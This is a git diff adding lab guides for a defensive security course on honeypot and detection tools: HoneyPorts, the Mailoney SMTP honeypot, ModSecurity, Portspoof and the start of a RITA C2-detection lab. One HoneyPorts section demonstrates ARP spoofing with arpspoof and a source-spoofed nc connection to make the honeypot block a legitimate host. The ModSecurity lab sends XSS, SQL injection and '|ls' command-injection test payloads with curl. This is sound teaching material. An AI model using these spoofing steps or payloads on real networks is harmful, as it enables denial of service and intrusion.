+- I will connect to that IP on **port 3389** from a box on the same network segment in order to test the functionality of **Honeyports**.
+
+- I will be using RDP to make the connection.
+
+- To open Remote Desktop hit `Windows Key + R` and input `mstsc.exe` before hitting OK.
+
+![](HoneyPorts_files/Image_001.png)
+
+- Next simply tell RDP to connect to your machine's **IP address**.
+
+![](HoneyPorts_files/Image_002.png)
+
+- We get an almost immediate error, this is a great sign that **Honeyports** is doing its job.
+
+![](HoneyPorts_files/Image_003.png)
+
+- Any subsequent connection attempts are met with failure.
+
+![](HoneyPorts_files/Image_004.png)
+
+- And we can confirm back inside our ADHD instance that the IP was blocked.
+
+```bash
+sudo iptables -L
+```
+
+Output:
+```
+Chain INPUT (policy ACCEPT)
+target     prot opt source               destination
+REJECT     all  --  192.168.1.149        anywhere             reject-with icmp-port-unreachable
+
+Chain FORWARD (policy ACCEPT)
+target     prot opt source               destination
+
+Chain OUTPUT (policy ACCEPT)
+target     prot opt source               destination
+
+Chain ARTILLERY (0 references)
+target     prot opt source               destination
+```
+
+- You can clearly see the REJECT policy for 192.168.1.149 (The address I was connecting from).
+
+- To remove this rule we can either:
+
+```bash
+sudo iptables -D INPUT -s <<YOUR-IP>> -j REJECT
+```
+
+- Or Flush all the rules:
+
+```bash
+sudo iptables -F
+```
+
+### Example 3: Spoofing TCP Connect for Denial Of Service
+
+
+- **Honeyports** are designed to only properly respond to and **block** full TCP connects.  This is done to make it difficult for an attacker to **spoof** being someone else and trick the **Honeyport** into **blocking** the **spoofed** address.  **TCP connections** are difficult to spoof if the communicating hosts properly implement secure (hard to guess) sequence numbers.  Of course, if the attacker can **"become"** the host they wish to **spoof**, there isn't much you can do to stop them.
+
+- This example will demonstrate how to **spoof** a TCP connect as someone else, for the purposes of helping you learn to recognize the limitations of **Honeyports**.
+
+- If you can convince the host running **Honeyports** that you are the target machine, you can send packets as the **target**.  We will accomplish this through a **MITM** attack using **ARP Spoofing**.
+
+- Let's assume we have **two different machines**, they may be either **physical** or **virtual**.
+- One must be your **ADHD machine** running **Honeyports**, the other for this example will be a **Kali box**.
+- They must both be on the same **subnet**.
+
+>[!NOTE]
+> Newer **Linux** operating systems like **ADHD** often have builtin **protection** against this attack.
+
+- This protection mechanism is found in `/proc/sys/net/ipv4/conf/all/arp_accept`. A **1** in this file means that **ADHD** is configured to **accept** unsolicited **ARP response**s.  You can set this value by running the following command
+
+```bash
+echo 1 > /proc/sys/net/ipv4/conf/all/arp_accept
+```
+
+- If our **ADHD machine** (running the **Honeyports**) is at 192.168.1.144 and we want to spoof 192.168.1.1
+
+>[!IMPORTANT]
+>
+> Your IP will be **different**, use **yours**
+
+- Let's start by performing our **MITM attack**.
+
+```bash
+arpspoof -i eth0 -t 192.168.1.144 192.168.1.1 2>/dev/null &
+```
+```bash
+arpspoof -i eth0 -t 192.168.1.1 192.168.1.144 2>/dev/null &
+```
+
+- If you want to confirm that the **MITM attack** is working first find the **MAC address** of the **Kali box**.
+
+```bash
+ifconfig -a | head -n 1 | awk '{print $5}
+```
+
+Output:
+<pre>00:0c:29:40:1c:d3</pre>
+
+>[!IMPORTANT]
+>
+> Your **MAC Address** will be **different**, use **yours**
+
+- Then on the **ADHD machine** run this command to determine the current mapping of **IPs** to **MACs**.
+
+```bash
+arp -a
+```
+
+- Look to see if the **IP** you are attempting to **spoof** is mapped to the **MAC address** from the previous step.
+
+- Once we have properly performed our **arpspoof** we will move on to assigning a **temporary IP** to the **Kali machine**.
+
+- This will convince the **Kali machine** to send packets as the **spoofed host**.
+
+```bash
+ifconfig eth0:0 192.168.1.1 netmask 255.255.255.0 up
+```
+
+- The last step is to connect from the **Kali box** to the **ADHD machine** on a **Honeyport**, as `192.168.1.1`
+
+>[!IMPORTANT]
+>
+> Your IP will be **different**, use **yours**
+
+For this example, lets say that **port 3389** is a **Honeyport** as we used before in **[Example 1: Monitoring A Port With HoneyPorts]**.
+
+```bash
+nc 192.168.1.144 3389 -s 192.168.1.1
+```
+
+- It's that easy, if you list the **firewall rules** of the **ADHD machine** you should find a rule rejecting connections from `192.168.1.1`
+
+- Mitigation of this **vulnerability** can be accomplished with either **MITM protections**, or careful monitoring of the created firewall rules.
+
+
+***                                                                 
+<b><i>Continuing the course? </br>[Next Lab](/IntroClassFiles/Tools/IntroClass/ADHD/openCanary.md)</i></b>
+
+<b><i>Want to go back? </br>[Previous Lab](/IntroClassFiles/Tools/IntroClass/ADHD/Portspoof/Portspoof.md)</i></b>
+
+<b><i>Looking for a different lab? </br>[Lab Directory](/IntroClassFiles/navigation.md)</i></b>
+
+***Finished with the Labs?***
+
+Please be sure to destroy the lab environment!
+
+[Click here for instructions on how to destroy the Lab Environment](/IntroClassFiles/Tools/IntroClass/LabDestruction/labdestruction.md)
+
+---
+
+
+
+
+
+
diff --git a/IntroClassFiles/Tools/IntroClass/HoneyPorts_files/Image_001.png b/IntroClassFiles/Tools/IntroClass/ADHD/HoneyPorts/HoneyPorts_files/Image_001.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/HoneyPorts_files/Image_001.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/HoneyPorts/HoneyPorts_files/Image_001.png
diff --git a/IntroClassFiles/Tools/IntroClass/HoneyPorts_files/Image_001_1.PNG b/IntroClassFiles/Tools/IntroClass/ADHD/HoneyPorts/HoneyPorts_files/Image_001_1.PNG
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/HoneyPorts_files/Image_001_1.PNG
rename to IntroClassFiles/Tools/IntroClass/ADHD/HoneyPorts/HoneyPorts_files/Image_001_1.PNG
diff --git a/IntroClassFiles/Tools/IntroClass/HoneyPorts_files/Image_002.png b/IntroClassFiles/Tools/IntroClass/ADHD/HoneyPorts/HoneyPorts_files/Image_002.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/HoneyPorts_files/Image_002.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/HoneyPorts/HoneyPorts_files/Image_002.png
diff --git a/IntroClassFiles/Tools/IntroClass/HoneyPorts_files/Image_002_1.PNG b/IntroClassFiles/Tools/IntroClass/ADHD/HoneyPorts/HoneyPorts_files/Image_002_1.PNG
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/HoneyPorts_files/Image_002_1.PNG
rename to IntroClassFiles/Tools/IntroClass/ADHD/HoneyPorts/HoneyPorts_files/Image_002_1.PNG
diff --git a/IntroClassFiles/Tools/IntroClass/HoneyPorts_files/Image_003.png b/IntroClassFiles/Tools/IntroClass/ADHD/HoneyPorts/HoneyPorts_files/Image_003.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/HoneyPorts_files/Image_003.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/HoneyPorts/HoneyPorts_files/Image_003.png
diff --git a/IntroClassFiles/Tools/IntroClass/HoneyPorts_files/Image_003_1.png b/IntroClassFiles/Tools/IntroClass/ADHD/HoneyPorts/HoneyPorts_files/Image_003_1.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/HoneyPorts_files/Image_003_1.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/HoneyPorts/HoneyPorts_files/Image_003_1.png
diff --git a/IntroClassFiles/Tools/IntroClass/HoneyPorts_files/Image_004.png b/IntroClassFiles/Tools/IntroClass/ADHD/HoneyPorts/HoneyPorts_files/Image_004.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/HoneyPorts_files/Image_004.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/HoneyPorts/HoneyPorts_files/Image_004.png
diff --git a/IntroClassFiles/Tools/IntroClass/HoneyPorts_files/Image_004_1.png b/IntroClassFiles/Tools/IntroClass/ADHD/HoneyPorts/HoneyPorts_files/Image_004_1.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/HoneyPorts_files/Image_004_1.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/HoneyPorts/HoneyPorts_files/Image_004_1.png
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/Mailoney.md b/IntroClassFiles/Tools/IntroClass/ADHD/Mailoney.md
new file mode 100644
index 00000000..72f70b3c
--- /dev/null
+++ b/IntroClassFiles/Tools/IntroClass/ADHD/Mailoney.md
@@ -0,0 +1,164 @@
+![image](https://github.com/user-attachments/assets/068fae26-6e8f-402f-ad69-63a4e6a1f59e)
+
+
+# Mailoney
+
+You’ll deploy **Mailoney** (a low-interaction SMTP honeypot) and then **simulate simple email-based attacks** to see what it captures
+
+---
+
+# Setup
+
+- Open a terminal
+
+```bash
+cd ~/ADCD/mailoney
+```
+
+```bash
+source venv/bin/activate
+```
+
+---
+
+# Start Mailoney (SQLite + port 2525)
+
+We’ll run Mailoney on:
+- IP: `127.0.0.1`
+- Port: `2525`
+- Database: `sqlite:///mailoney.db` (a file in this folder)
+
+Start it:
+```bash
+python main.py \
+  --ip 127.0.0.1 \
+  --port 2525 \
+  --server-name mail.lab \
+  --db-url sqlite:///mailoney.db \
+  --log-level INFO
+```
+
+<img width="1197" height="565" alt="2026-03-16_12-56" src="https://github.com/user-attachments/assets/105789a4-c49e-41e3-a811-0b35dcaba586" />
+
+
+Leave this terminal open (it will show logs)
+
+> If you stop it later: press **Ctrl+C**
+
+---
+
+# Verify it’s listening
+
+Open a **second terminal**, go back to the same folder, and activate the venv again:
+
+```bash
+cd ~/ADCD/mailoney
+```
+
+```bash
+source venv/bin/activate
+```
+
+Check the listening port:
+```bash
+ss -lntp | grep 2525
+```
+
+<img width="924" height="49" alt="2026-03-16_12-57" src="https://github.com/user-attachments/assets/cc17d320-9c7a-4cd4-8cc3-948f3b2798ac" />
+
+
+You should see something listening on `127.0.0.1:2525`
+
+---
+
+# Simulate a basic SMTP “email delivery”
+
+We’ll use **swaks** (Swiss Army Knife for SMTP)
+
+Send a test email into the honeypot:
+```bash
+swaks \
+  --server 127.0.0.1 \
+  --port 2525 \
+  --from alice@demo.local \
+  --to bob@demo.local \
+  --header "Subject: Hello from the lab" \
+  --body "This is a harmless test message captured by Mailoney."
+```
+
+- Back in the **Mailoney Terminal**, we can see the hit
+
+<img width="546" height="29" alt="2026-03-16_12-58" src="https://github.com/user-attachments/assets/34bdde8e-264a-4d13-83d0-50eea8f03cab" />
+
+- Go back to the **Second Terminal** and do this to get the data received by the honeypot from the last hit
+```bash
+sqlite3 -header -column mailoney.db \
+"SELECT id, timestamp, ip_address, session_data
+ FROM smtp_sessions
+ ORDER BY timestamp DESC
+ LIMIT 1;"
+```
+
+<img width="1904" height="510" alt="2026-03-16_13-00" src="https://github.com/user-attachments/assets/01273dfd-e8ae-4dbf-926d-8c35b90b2caa" />
+
+
+
+---
+
+# Simulate a credential-harvesting attempt
+
+Attackers often try weak credentials on SMTP servers
+
+Run this to attempt SMTP AUTH LOGIN:
+```bash
+swaks \
+  --server 127.0.0.1 \
+  --port 2525 \
+  --auth LOGIN \
+  --auth-user admin \
+  --auth-password 'Password123!' \
+  --quit-after AUTH
+```
+
+**What to observe**
+- Even if auth does not truly “succeed” (it’s a honeypot), Mailoney is designed to **capture the authentication attempt**
+
+
+## Inspect what Mailoney captured
+
+```bash
+sqlite3 -header -column mailoney.db \
+"SELECT id, timestamp, ip_address, session_data
+ FROM smtp_sessions
+ ORDER BY timestamp DESC
+ LIMIT 1;"
+```
+
+
+<img width="1902" height="375" alt="2026-03-16_13-09" src="https://github.com/user-attachments/assets/cf8fcce6-3932-4307-9b69-c91b6ebf9186" />
+
+
+
+
+
+
+
+
+
+
+
+
+***                                                                 
+<b><i>Continuing the course? </br>[Next Lab](/IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/Bluespawn.md)</i></b>
+
+<b><i>Want to go back? </br>[Previous Lab](/IntroClassFiles/Tools/IntroClass/ADHD/GoPhish.md)</i></b>
+
+<b><i>Looking for a different lab? </br>[Lab Directory](/IntroClassFiles/navigation.md)</i></b>
+
+***Finished with the Labs?***
+
+Please be sure to destroy the lab environment!
+
+[Click here for instructions on how to destroy the Lab Environment](/IntroClassFiles/Tools/IntroClass/LabDestruction/labdestruction.md)
+
+---
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/Metta.md b/IntroClassFiles/Tools/IntroClass/ADHD/Metta.md
new file mode 100644
index 00000000..6dd52919
--- /dev/null
+++ b/IntroClassFiles/Tools/IntroClass/ADHD/Metta.md
@@ -0,0 +1,31 @@
+![image](https://github.com/user-attachments/assets/068fae26-6e8f-402f-ad69-63a4e6a1f59e)
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+***                                                                 
+<b><i>Continuing the course? </br>[Next Lab](/IntroClassFiles/Tools/IntroClass/ADHD/Caldera.md)</i></b>
+
+<b><i>Want to go back? </br>[Previous Lab](/IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/Bluespawn.md)</i></b>
+
+<b><i>Looking for a different lab? </br>[Lab Directory](/IntroClassFiles/navigation.md)</i></b>
+
+***Finished with the Labs?***
+
+Please be sure to destroy the lab environment!
+
+[Click here for instructions on how to destroy the Lab Environment](/IntroClassFiles/Tools/IntroClass/LabDestruction/labdestruction.md)
+
+---
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/ModSecurity.md b/IntroClassFiles/Tools/IntroClass/ADHD/ModSecurity.md
new file mode 100644
index 00000000..ce4fca1d
--- /dev/null
+++ b/IntroClassFiles/Tools/IntroClass/ADHD/ModSecurity.md
@@ -0,0 +1,246 @@
+![image](https://github.com/user-attachments/assets/068fae26-6e8f-402f-ad69-63a4e6a1f59e)
+
+# ModSecurity 
+
+# Ubuntu VM
+
+**Goal:** With **ModSecurity**,perform simple detections and blocks (XSS, SQLi, command injection), view logs, and write a simple custom rule
+
+
+>[!NOTE]
+>Apache is running on port 8083 on the machine
+
+---
+
+## Lab overview
+
+- Enable ModSecurity (Detection/Prevention mode)
+- Test attacks with `curl` (XSS, SQLi, command injection)
+- Inspect audit logs and Apache logs
+- Create a simple custom rule to block a pattern
+- Toggle rule states and observe behavior
+
+---
+
+# Start
+
+- Start and enable Apache:
+```bash
+sudo systemctl enable --now apache2
+sudo systemctl status apache2 --no-pager
+```
+
+- Check Apache is serving:
+```bash
+curl -I http://localhost:8083
+```
+
+<img width="555" height="226" alt="2026-03-18_13-05" src="https://github.com/user-attachments/assets/dedfa3da-3e1f-409b-be46-5b4185984ab5" />
+
+
+>[!IMPORTANT]
+>ModSecurity is already installed for this lab
+
+- Confirm module installed:
+```bash
+sudo apachectl -M | grep security
+```
+
+<img width="603" height="74" alt="2026-03-18_13-22" src="https://github.com/user-attachments/assets/2273b948-722d-4747-a2f7-17794e676b70" />
+
+
+
+- The default configuration file lives at: `/etc/modsecurity/modsecurity.conf-recommended`
+
+- We are using the basic config: `/etc/modsecurity/modsecurity.conf`
+
+- Ensure `SecRuleEngine` is set to `DetectionOnly` initially:
+```bash
+sudo cat /etc/modsecurity/modsecurity.conf
+```
+
+- Important lines to check:
+- `SecRuleEngine DetectionOnly` - detects but does not block
+- `SecAuditLog` - path to the audit log (usually `/var/log/apache2/modsec_audit.log`)
+
+<img width="279" height="31" alt="2026-03-18_13-25" src="https://github.com/user-attachments/assets/7eaaf190-a8ad-4df2-924f-b21287db6c93" />
+
+
+<img width="462" height="28" alt="2026-03-18_13-24" src="https://github.com/user-attachments/assets/4379616a-eaf4-4038-9d74-a7ba30297a10" />
+
+---
+
+## Install OWASP Core Rule Set (v3.3.5) - Copy-Paste is your friend
+```bash
+cd /tmp
+sudo rm -rf /usr/share/modsecurity-crs
+sudo git clone --branch v3.3.5 --depth 1 https://github.com/coreruleset/coreruleset.git
+sudo mkdir -p /usr/share/modsecurity-crs
+sudo cp -r coreruleset/* /usr/share/modsecurity-crs/
+sudo cp /usr/share/modsecurity-crs/crs-setup.conf.example /usr/share/modsecurity-crs/crs-setup.conf
+```
+
+---
+
+## Enable CRS (Single Include Only)
+```bash
+sudo tee /etc/apache2/mods-available/security2.conf >/dev/null <<'EOF'
+<IfModule security2_module>
+    IncludeOptional /etc/modsecurity/modsecurity.conf
+    IncludeOptional /usr/share/modsecurity-crs/crs-setup.conf
+    IncludeOptional /usr/share/modsecurity-crs/rules/*.conf
+    IncludeOptional /etc/modsecurity/custom-rules/*.conf
+</IfModule>
+EOF
+
+sudo ln -sf /etc/apache2/mods-available/security2.conf /etc/apache2/mods-enabled/security2.conf
+sudo apachectl configtest
+sudo systemctl restart apache2
+```
+
+Test:
+```bash
+curl -I http://localhost:8083
+```
+
+<img width="602" height="223" alt="2026-03-18_13-28" src="https://github.com/user-attachments/assets/364a8926-2a08-444c-81e9-202c9fdc1a72" />
+
+
+---
+
+## SConfirm ModSecurity is running
+- Check Apache error log for ModSecurity startup messages:
+```bash
+sudo tail -n 200 /var/log/apache2/error.log
+```
+
+<img width="1754" height="224" alt="2026-03-18_13-29" src="https://github.com/user-attachments/assets/1bc6da59-91f6-48eb-a4a3-60a7e0abb558" />
+
+
+
+Check the audit log file exists (may be empty initially):
+```bash
+sudo ls -l /var/log/apache2/modsec_audit.log || ls -l /var/log/modsec_audit.log
+```
+
+
+<img width="1070" height="50" alt="2026-03-18_13-30" src="https://github.com/user-attachments/assets/9efcf029-2fc1-4e9e-a338-0990abadc394" />
+
+
+---
+
+## Simple detection tests (DetectionOnly mode)
+- With `SecRuleEngine DetectionOnly` ModSecurity will log but not block.
+
+### XSS test (reflected)
+```bash
+curl -v "http://localhost:8083/?q=<script>alert(1)</script>" -s -o /dev/null
+```
+
+<img width="1037" height="508" alt="2026-03-18_13-33" src="https://github.com/user-attachments/assets/40b8e6e6-4153-445f-ae5a-3e206e336d0a" />
+
+
+- Now tail the **audit log** (open another terminal):
+```bash
+sudo tail -n 120 /var/log/apache2/modsec_audit.log
+```
+
+<img width="1906" height="323" alt="2026-03-18_13-35" src="https://github.com/user-attachments/assets/0ac5400b-c83a-476f-b65c-721eede6f7ef" />
+
+
+- **BOOM!** What is cool about **ModSecurity** is that not only does it detect attacks really well, but it also logs them extensively, as you can see, giving details about everything
+
+
+### SQL Injection test
+```bash
+curl -v "http://localhost:8083/?id=1%20OR%201=1" -s -o /dev/null
+```
+
+```bash
+sudo tail -n 120 /var/log/apache2/modsec_audit.log
+```
+
+<img width="1905" height="509" alt="2026-03-18_13-39" src="https://github.com/user-attachments/assets/123bada1-631d-4152-9ba0-627c85dc62c6" />
+
+
+### Command injection-like input
+```bash
+curl -v "http://localhost:8083/?cmd=|ls" -s -o /dev/null
+```
+```bash
+sudo tail -n 120 /var/log/apache2/modsec_audit.log
+```
+
+<img width="1908" height="600" alt="2026-03-18_13-40" src="https://github.com/user-attachments/assets/b2a81860-cd09-4ca8-9f75-9c98d59f1e8a" />
+
+
+
+- Each **curl** should create **ModSecurity** audit events. Study the audit log format: it is split into sections (`--A--`, `--B--`) with **request**, **response**, and **matched rule details**
+
+---
+
+## Switch to prevention mode (blocking)
+- Now turn ModSecurity into blocking mode.
+
+**Important:** On some rules and setups enabling blocking will return `403` for many requests. This is expected - we want to see blocking.
+
+Edit the config:
+```bash
+sudo sed -i 's/SecRuleEngine DetectionOnly/SecRuleEngine On/' /etc/modsecurity/modsecurity.conf
+```
+```bash
+sudo systemctl restart apache2
+```
+
+- Test the same payloads:
+
+```bash
+curl -v "http://localhost:8083/?q=<script>alert(1)</script>" -s -o /dev/null -w "%{http_code}\n"
+# Expected: 403 (or another non-200)
+```
+
+
+<img width="1218" height="468" alt="2026-03-18_13-41" src="https://github.com/user-attachments/assets/de19f4a5-1acc-4739-9db7-a2ca9b22396c" />
+
+
+```bash
+curl -v "http://localhost:8083/?id=1%20OR%201=1" -s -o /dev/null -w "%{http_code}\n"
+```
+
+Review the audit log and Apache error log for blocked events:
+```bash
+sudo tail -n 120 /var/log/apache2/modsec_audit.log
+```
+
+```bash
+sudo tail -n 200 /var/log/apache2/error.log
+```
+
+<img width="1906" height="94" alt="2026-03-18_13-42" src="https://github.com/user-attachments/assets/3b507553-cd47-4a5f-a92a-f9b55a12222f" />
+
+
+---
+
+## Useful file locations
+- Main config: `/etc/modsecurity/modsecurity.conf`
+- Apache include: `/etc/apache2/mods-enabled/security2.conf`
+- CRS rules: `/usr/share/modsecurity-crs/rules/`
+- CRS setup: `/usr/share/modsecurity-crs/crs-setup.conf`
+- Audit log: `/var/log/apache2/modsec_audit.log` (or `/var/log/modsec_audit.log`)
+- Apache error log: `/var/log/apache2/error.log`
+
+
+***                                                                 
+<b><i>Continuing the course? </br>[Next Lab](/IntroClassFiles/Tools/IntroClass/ADHD/Haraka.md)</i></b>
+
+<b><i>Want to go back? </br>[Previous Lab](/IntroClassFiles/Tools/IntroClass/ADHD/Glastopf.md)</i></b>
+
+<b><i>Looking for a different lab? </br>[Lab Directory](/IntroClassFiles/navigation.md)</i></b>
+
+***Finished with the Labs?***
+
+Please be sure to destroy the lab environment!
+
+[Click here for instructions on how to destroy the Lab Environment](/IntroClassFiles/Tools/IntroClass/LabDestruction/labdestruction.md)
+
+---
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/Portspoof/Portspoof.md b/IntroClassFiles/Tools/IntroClass/ADHD/Portspoof/Portspoof.md
new file mode 100644
index 00000000..748c0da5
--- /dev/null
+++ b/IntroClassFiles/Tools/IntroClass/ADHD/Portspoof/Portspoof.md
@@ -0,0 +1,207 @@
+![image](https://github.com/user-attachments/assets/068fae26-6e8f-402f-ad69-63a4e6a1f59e)
+
+
+# Portspoof
+
+# Windows VM
+
+Website
+-------
+
+<http://portspoof.org/>
+
+Description
+-----------
+
+Portspoof is meant to be a lightweight, fast, portable and secure addition to any firewall system or security system. The general goal of the program is to make the reconnaissance phase as slow and bothersome as possible for your attackers. This is quite a change to the standard aggressive Nmap scan, which will give a full view of your system's running services.
+
+By using all of the techniques mentioned below:
+
+* your attackers will have a tough time while trying to identify all of your listening services.
+* the only way to determine if a service is emulated is through a protocol probe (imagine probing protocols for 65k open ports!).
+* it takes more than 8 hours and 200MB of sent data in order to get all of the service banners for your system (nmap -sV -p - equivalent).
+
+---
+
+The Portspoof program's primary goal is to enhance OS security through a set of new techniques:
+
+#### Technique 1: All TCP ports are always open
+
+Instead of informing an attacker that a particular port is CLOSED or FILTERED, a system with Portspoof will return SYN+ACK for every port connection attempt.
+
+As a result it is impractical to use stealth (SYN, ACK, etc.) port scanning against your system, since all ports are always reported as OPEN. With this approach it is really difficult to determine if a valid software is listening on a particular port (check out the screenshots).
+
+#### Technique 2: Every open TCP port emulates a service
+
+Portspoof has a huge dynamic service signature database, which will be used to generate responses to your attackers scanning software service probes.
+
+Scanning software usually tries to determine a service that is running on an open port. This step is mandatory if one would want to identify port numbers on which you are running your services on a system behind the Portspoof. For this reason Portspoof will respond to every service probe with a valid service signature, which is dynamically generated based on a service signature regular expression database.
+
+As a result an attacker will not be able to determine which port numbers your system is truly using.
+
+Install Location
+----------------
+
+`/usr/local/bin/portspoof`
+
+Config File Location
+--------------------
+
+`/usr/local/etc/portspoof.conf`
+`/usr/local/etc/portspoof_signatures`
+
+Usage
+-----
+
+```bash
+portspoof -h
+```
+
+```
+Usage: portspoof [OPTION]...
+Portspoof - service emulator / frontend exploitation framework.
+
+-i			  ip : Bind to a particular  IP address
+-p			  port : Bind to a particular PORT number
+-s			  file_path : Portspoof service signature regex. file
+-c			  file_path : Portspoof configuration file
+-l			  file_path : Log port scanning alerts to a file
+-f			  file_path : FUZZER_MODE - fuzzing payload file list
+-n			  file_path : FUZZER_MODE - wrapping signatures file list
+-1			  FUZZER_MODE - generate fuzzing payloads internally
+-2			  switch to simple reply mode (doesn't work for Nmap)!
+-D			  run as daemon process
+-d			  disable syslog
+-v			  be verbose
+-h			  display this help and exit
+```
+
+
+Example 1: Starting Portspoof
+-----------------------------
+
+When ran, Portspoof listens on a single port. By default this is port 4444. In order to fool a port scan, we have to allow Portspoof to listen on *every* port. To accomplish this we will use an `iptables` command that redirects every packet sent to any port to port 4444 where the Portspoof port will be listening. This allows Portspoof to respond on any port.
+
+
+
+
+- Open **Ubuntu Shell**
+
+<img width="90" height="104" alt="Screenshot From 2026-02-23 10-28-37" src="https://github.com/user-attachments/assets/ae6d408b-7622-4545-b849-aef3d8fa0cb4" />
+
+
+
+
+Let's become root:
+
+```bash
+sudo su -
+```
+
+Let's add the firewall rules.
+
+```bash
+iptables -t nat -A PREROUTING -p tcp -m tcp --dport 1:20 -j REDIRECT --to-ports 4444
+```
+
+Then run Portspoof with no options, which defaults it to "open port" mode. This mode will just return OPEN state for every connection attempt.
+
+```bash
+portspoof
+```
+
+<img width="1007" height="67" alt="image" src="https://github.com/user-attachments/assets/3664f938-381c-4e12-969b-a482788fb47b" />
+
+
+
+If you were to scan using Nmap from another Windows command prompt. Now you would see something like this:
+
+>[!IMPORTANT]
+>
+>You *must* run Nmap from a different machine. Scanning from the same machine will not reach Portspoof.
+
+Open a Windows command prompt:
+
+<img width="74" height="91" alt="Screenshot From 2026-02-07 17-59-56" src="https://github.com/user-attachments/assets/c2a1f12a-b377-478d-9416-ff4c8291dc01" />
+
+Then, run nmap:
+
+```bash
+nmap -p 1-10 linux.cloudlab.lan
+```
+
+
+![image](https://github.com/user-attachments/assets/d51c7589-8fbf-4b0a-8c69-6c21629e588d)
+
+
+All ports are reported as open! When run this way, Nmap reports the service that typically runs on each port.
+
+To get more accurate results, an attacker might run an Nmap service scan, which would actively try to detect the services running. But performing an Nmap service detection scan shows that something is amiss because all ports are reported as running the same type of service.
+
+```bash
+nmap -p 1-10 -sV linux.cloudlab.lan
+```
+
+![image](https://github.com/user-attachments/assets/148e82e4-f8fb-4df5-8fef-6b758d1e05e1)
+
+
+Example 2: Spoofing Service Signatures
+--------------------------------------
+
+Showing all ports as open is all well and good, but the same thing could be accomplished with a simple netcat listener:
+
+```bash
+nc -l -k 4444
+```
+
+To make things more interesting, how about we have Portspoof fool Nmap into actually detecting real services running?
+
+Let's kill the running version of Portspoof with `Ctrl + C` then restart it with signatures:
+
+```bash
+portspoof -s /etc/portspoof/portspoof_signatures
+```
+
+![image](https://github.com/user-attachments/assets/e1a2857a-7628-46d0-8808-b0af2add49f1)
+
+This mode will generate and feed port scanners like Nmap bogus service signatures.
+
+Now running an Nmap service detection scan against the top 100 most common ports (a common hacker activity) will turn up some very interesting results.
+
+```bash
+nmap -p 1-10 -sV linux.cloudlab.lan
+```
+
+![image](https://github.com/user-attachments/assets/c4281e6f-4937-4477-b6a9-d2344d2a2699)
+
+Notice how all of the ports are still reported as open, but now Nmap reports a unique service on each port. 
+
+This will either: 
+1) Lead an attacker down a rabbit hole investigating each port while wasting their time...
+2) or the attacker may discard the results as false positives and ignore this machine altogether, leaving any legitimate service running untouched.
+
+Example 3: Cleaning Up
+----------------------
+
+To reset our VM, you can reboot (recommended) or:
+
+1. Kill Portspoof by pressing `Ctrl + C`.
+2. Flush all iptables rules by running the command (as root): 
+```bash
+sudo iptables -t nat -F
+```
+
+***                                                                 
+<b><i>Continuing the course? </br>[Next Lab](/IntroClassFiles/Tools/IntroClass/ADHD/HoneyPorts/HoneyPorts.md)</i></b>
+
+<b><i>Want to go back? </br>[Previous Lab](/IntroClassFiles/Tools/IntroClass/ADHD/Cowrie/Cowrie.md)</i></b>
+
+<b><i>Looking for a different lab? </br>[Lab Directory](/IntroClassFiles/navigation.md)</i></b>
+
+***Finished with the Labs?***
+
+Please be sure to destroy the lab environment!
+
+[Click here for instructions on how to destroy the Lab Environment](/IntroClassFiles/Tools/IntroClass/LabDestruction/labdestruction.md)
+
+---
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/RITA.md b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/RITA.md
new file mode 100755
index 00000000..4951a956
--- /dev/null
+++ b/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/RITA.md
@@ -0,0 +1,138 @@
+
+![image](https://github.com/user-attachments/assets/068fae26-6e8f-402f-ad69-63a4e6a1f59e)
+
+# RITA and AC Hunter
+
+In this lab, we are going to look at detecting command and control traffic on a network.
+
+We will be using **Real Intelligence Threat Analytics** (RITA) for this lab.
+
+To start we first need to open Windows File Explorer and navigate to the tools directory.
+
+First, open File Explorer:
+
+<img width="534" height="48" alt="OpenFileExplorer" src="https://github.com/user-attachments/assets/bd5ac519-825a-4921-bed6-3b8baf52a4b7" />
+
+Then, select the IntroLabs directory:
+
+![](attachments/rita_navintrolabs.png)
+
+Then, select rita-html-report:
+
+<img width="1116" height="535" alt="2026-02-23_15-18" src="https://github.com/user-attachments/assets/8a35fc63-ff0f-4cda-92fe-2d658131d050" />
+
+Then, select **index.html**:
+
+![](attachments/rita_navindex.png)
+
+Let’s select **VSAGENT-2017-3-15**.
+
+![](attachments/rita_vsagent.png)
+
+The tabs across the top allow you to review the output for all the different analysis modules of RITA.
+For **VSAgent** we will be focusing on **Beacons**, **Blacklisted** and **User Agents**.
+
+Please select the **Beacons** tab.
+
+![](attachments/rita_beaconview.png)
+
+Some backdoors have a very strong **“heartbeat”**. This is where a backdoor will constantly reconnect to get commands from an attacker at a specific interval. The interval consistency of the **“heartbeat”** is the TS score where a value of **1** is perfect. The top value in this set is the **VSAgent** communication. We will talk about the other connections in a few moments.
+
+We also have the number of connections. While some beacons have a **“strong”** heartbeat, they are very short in nature. Our VSAgent connection had a very large number of connections which had very strong intervals, while some of the others (e.g. the 64.4.54.253 addresses) had a strong **"heartbeat"**, but not as many connections. We will also talk about TS Duration. This is detecting how consistent each connection duration is. For example, if every connection is 2 seconds and there are 8000+ it would have a very strong **TS Duration** score.
+
+The other fields are statistical analysis fields showing things like mode range and skew.
+
+Now, lets navigate back to the first menu by clicking the **RITA** tab. 
+
+![](attachments/rita_rita.png)
+
+Then, select **DNSCat-2017-03-21**. We are going to review a backdoor which does not quite fit the same mold as **VSAgent**.
+
